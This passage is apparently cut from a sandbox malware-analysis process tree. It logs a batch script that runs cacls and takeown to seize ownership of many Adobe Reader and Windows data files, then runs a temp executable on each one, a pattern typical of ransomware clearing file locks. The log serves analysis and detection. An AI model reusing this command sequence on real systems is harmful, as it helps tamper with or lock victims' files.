    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"
    3⤵
    PID:1856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1716
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:204
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""
  2⤵
  PID:1280
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"
    3⤵
    PID:1228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1912
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1192
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:796
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:1520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "background.png" -nobanner
    3⤵
    PID:2044
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "background.png" -nobanner
      4⤵
      PID:1088
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  2⤵
  PID:1424
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1264
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
    3⤵
    PID:1224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1716
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1808
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1696
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  2⤵
  PID:1480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
    3⤵
    - Modifies file permissions
    PID:1704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1984
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:752
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1472
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""
  2⤵
  PID:1080
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"
    3⤵
    - Modifies file permissions
    PID:1428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "add_reviewer.gif" -nobanner
    3⤵
    PID:2000
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "add_reviewer.gif" -nobanner
      4⤵
      PID:528
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1520
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""
  2⤵
  PID:208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C
    3⤵
    PID:1224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "forms_received.gif" -nobanner
    3⤵
    PID:1716
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "forms_received.gif" -nobanner
      4⤵
      PID:1944
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""
  2⤵
  PID:212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"
    3⤵
    PID:1800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "reviews_super.gif" -nobanner
    3⤵
    PID:796
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "reviews_super.gif" -nobanner
      4⤵
      PID:1076
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:828
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""
  2⤵
  PID:1548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "submission_history.gif" -nobanner
    3⤵
    PID:1328
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "submission_history.gif" -nobanner
      4⤵
      PID:1468
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:1224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"
    3⤵
    - Modifies file permissions
    PID:1948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "Identity-H" -nobanner
    3⤵
    PID:1364
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "Identity-H" -nobanner
      4⤵
      PID:1240
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""
  2⤵
  PID:1316
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"
    3⤵
    PID:216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "MinionPro-Regular.otf" -nobanner
    3⤵
    PID:1984
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "MinionPro-Regular.otf" -nobanner
      4⤵
      PID:1752
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""
  2⤵
  PID:2028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "ZY______.PFB" -nobanner
    3⤵
    PID:1328
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "ZY______.PFB" -nobanner
      4⤵
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""
  2⤵
  PID:1532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "brt32.clx" -nobanner
    3⤵
    PID:1716
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "brt32.clx" -nobanner
      4⤵
      PID:208
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""
  2⤵
  PID:836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"
    3⤵
    PID:1728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "usa.fca" -nobanner
    3⤵
    PID:796
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "usa.fca" -nobanner
      4⤵
      PID:212
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1704
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""
  2⤵
  PID:1912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"
    3⤵
    - Modifies file permissions
    PID:1876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "CROATIAN.TXT" -nobanner
    3⤵
    PID:2012
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "CROATIAN.TXT" -nobanner
      4⤵
      PID:1328
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""
  2⤵
  PID:2028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"
    3⤵
    - Modifies file permissions
    PID:204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "CP1251.TXT" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "CP1251.TXT" -nobanner
      4⤵
      PID:1716
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:1532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    PID:1228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "background.png" -nobanner
    3⤵
    PID:212
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "background.png" -nobanner
      4⤵
      PID:796
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1704
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""
  2⤵
  PID:836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"
    3⤵
    - Modifies file permissions
    PID:1548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:1328
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""
  2⤵
  PID:1912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"
    3⤵
    - Modifies file permissions
    PID:1936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "qmgr0.dat" -nobanner
    3⤵
    PID:1716
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "qmgr0.dat" -nobanner
      4⤵
      PID:208
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:2028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    PID:1856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "device.png" -nobanner
    3⤵
    PID:796
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "device.png" -nobanner
      4⤵
      PID:212
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1704
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
  2⤵
  PID:1532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
    3⤵
    - Modifies file permissions
    PID:528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2012
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1328
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""
  2⤵
  PID:836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"
    3⤵
    - Modifies file permissions
    PID:1224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:1716
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:1912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    - Modifies file permissions
    PID:1800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "background.png" -nobanner
    3⤵
    PID:212
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "background.png" -nobanner
      4⤵
      PID:796
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1704
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  2⤵
  PID:2028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1328
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  2⤵
  PID:1532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1716
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:208
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab""
  2⤵
  PID:1468
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab" /E /G Admin:F /C
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab"
    3⤵
    PID:828
- - C:\Windows\SysWOW64\cmd.exe
